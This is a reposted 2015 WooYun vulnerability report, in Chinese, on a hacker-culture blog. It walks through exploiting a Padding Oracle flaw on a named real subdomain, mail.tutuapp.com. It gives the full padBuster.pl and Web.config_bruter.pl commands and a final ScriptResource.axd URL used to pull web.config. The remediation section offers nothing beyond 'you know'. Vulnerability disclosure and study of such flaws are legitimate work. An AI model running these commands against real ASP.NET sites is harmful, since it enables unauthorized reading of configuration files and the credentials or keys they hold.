记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

威锋网某站Padding Oracle Vulnerability信息泄露漏洞利用过程

2015-03-24 18:25

无聊中,翻翻了手机,发现有个兔兔助手,上网查了查,找找二级域名,恩?ASPX的,看来有戏

QQ图片20150321162820.png



让我们来翻翻源代码

QQ图片20150321162952.png





嗯,有预感,绝对能成,,来跑跑看



code 区域
padBuster.pl http://mail.tutuapp.com/WebResource.axd?d=PG-vNzrJAe0x8wW9Qe32fQ2 PG-vNzrJAe0x8wW9Qe32fQ2 16 -encoding 3 -plaintext "|||~/web.config"



QQ图片20150321164222.jpg



跑出第一步密钥

漏洞证明:

获得第一个密钥以后,我们来跑最终的密钥

code 区域
Web.config_bruter.pl http://mail.tutuapp.com/ScriptResource.axd WL0xH7zMv1v_Nz-6EP4qhQAAAAAAAAAAAAAAAAAAAAA1 16





跑出最终密钥

QQ图片20150321164413.png





code 区域
http://mail.tutuapp.com/ScriptResource.axd?d=-3hhH7QLUwWrXwAMYvLLaVi9MR-8zL9b_zc_uhD-KoUAAAAAAAAAAAAAAAAAAAAA0





QQ图片20150321162419.png

修复方案:

你懂的


知识来源: www.wooyun.org/bugs/wooyun-2015-0102853

阅读:134955 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“威锋网某站Padding Oracle Vulnerability信息泄露漏洞利用过程”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云